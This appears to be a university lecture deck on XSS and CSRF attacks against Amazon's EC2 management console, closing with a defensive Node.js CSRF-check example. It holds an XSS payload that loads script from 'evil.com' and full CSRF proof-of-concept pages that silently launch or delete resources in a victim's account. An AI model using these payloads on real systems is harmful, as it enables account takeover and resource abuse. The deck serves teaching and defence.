Marco Arena

Cloud Insecurity


A short presentation for a university class.


  1. 1. Marco Arena
  2. 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  4. 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  5. 5. Recalls • XSS, a simple example:

        Server-side JSP:
        <c:if test="${param.sayHello}">
          Hello ${param.name}!
        </c:if>

        Evil parameter:
        %3Cscript%20src%3D%22http%3A//evil.com/evil.js%22%3E%3C/script%3E

        Result:
        Hello <script src="http://evil.com/evil.js"></script>
  6. 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  7. 7. Recalls • CSRF, a simple example:

        ...
        <img src="http://trustedblog.com/addfriend.php?id=12345"/>
        ...

        [Diagram labels: User, Active session, Trusted blog (i.e. MySpace), Evil Site]
  9. 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  10. 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  11. 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  13. 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the security of the web management console. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  15. 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
  17. 17. Web management console vulnerabilities initialize.html (cross-domain image tag):

        <html>
        <body>
        <img src="https://console.aws.amazon.com/ec2/_launchWizardForm.jsp?action.ImageId=ami-00031337&architecture=i386&image_icon=%2Fimages%2Flogo_windows.gif&image_title=Basic%20Microsoft%20Windows%20Server%202003&selected_language=undefined&groupName=Webserver&keyName=undefined">
        </body>
        </html>
  18. 18. Web management console vulnerabilities launch.html:

        <html>
        <body>
        <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
          <input type="hidden" name="action.MinCount" value="1" />
          <input type="hidden" name="action.InstanceType" value="m1.small" />
          <input type="hidden" name="action.SecurityGroup" value="default" />
          <input type="hidden" name="action.SecurityGroup" value="Webserver" />
          <input type="hidden" name="action.MaxCount" value="1000000" />
          <input type="hidden" name="action.ImageId" value="ami-00031337" />
          <input type="hidden" name="mbtc" value="50084" />
          <input type="hidden" name="region" value="us-east-1" />
        </form>
        <script>
          setTimeout("document.LaunchEvilAMI.submit()",5000);
        </script>
        </body>
        </html>
  19. 19. Web management console vulnerabilities
  21. 21. Web management console vulnerabilities Merge (the browser will not display the reply of the web server):

        <html>
        <body>
        <iframe src="./initialize.html" height="0" width="0"></iframe>
        <iframe src="./launch.html" height="0" width="0"></iframe>
        </body>
        </html>
  22. 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
  23. 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
  26. 26. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are: – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates.
  27. 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  28. 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  30. 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
  31. 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and review their code continuously.
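The console attacks in the slides above succeed because state-changing requests were accepted on the strength of the session cookie alone. The following Node.js code is an added example, not taken from the slides or from Amazon's console: it shows server-side checks that reject both request shapes used there (a cross-site image GET and an auto-submitted form POST) by refusing state changes on safe methods, requiring a strict Origin match, and verifying a session-bound token. The origin, route names and request objects are hypothetical and constructed for illustration.

```javascript
const crypto = require("crypto");

const SERVER_KEY = crypto.randomBytes(32);          // per-deployment secret
const TRUSTED_ORIGIN = "https://console.example";   // hypothetical console origin
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);
// Hypothetical routes standing in for launch / terminate / delete-key-pair actions.
const STATE_CHANGING = new Set(["/instances/run", "/instances/terminate", "/keypairs/delete"]);

// Token = HMAC(server key, session id). A page on another origin can make the
// browser send the session cookie, but it cannot read or compute this value.
function issueToken(sessionId) {
  return crypto.createHmac("sha256", SERVER_KEY).update(sessionId).digest("hex");
}

function tokenMatches(sessionId, presented) {
  const expected = Buffer.from(issueToken(sessionId), "hex");
  const given = Buffer.from(String(presented || ""), "hex");
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

// Decide whether a request that already carries a valid session cookie may proceed.
function checkRequest(req) {
  if (!STATE_CHANGING.has(req.path)) return { allow: true, reason: "read-only route" };
  if (SAFE_METHODS.has(req.method)) return { allow: false, reason: "state change via safe method" };
  if (req.headers.origin !== TRUSTED_ORIGIN) return { allow: false, reason: "cross-origin or missing Origin" };
  if (!tokenMatches(req.sessionId, req.body.csrfToken)) return { allow: false, reason: "missing or invalid CSRF token" };
  return { allow: true, reason: "ok" };
}

// Constructed requests: the first two model what a cross-site <img> tag and an
// auto-submitted cross-site form produce; the third is the console's own form.
function sampleRequests(sessionId) {
  return [
    { method: "GET", path: "/instances/run", headers: {}, sessionId, body: {} },
    { method: "POST", path: "/instances/run", headers: { origin: "https://other.example" }, sessionId, body: {} },
    { method: "POST", path: "/instances/run", headers: { origin: TRUSTED_ORIGIN }, sessionId,
      body: { csrfToken: issueToken(sessionId) } },
  ];
}

for (const req of sampleRequests("sess-constructed-1")) {
  console.log(req.method, req.headers.origin || "(no Origin)", "->", checkRequest(req).reason);
}
```

Marking the session cookie `SameSite` adds a browser-side layer on top of these server-side checks.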
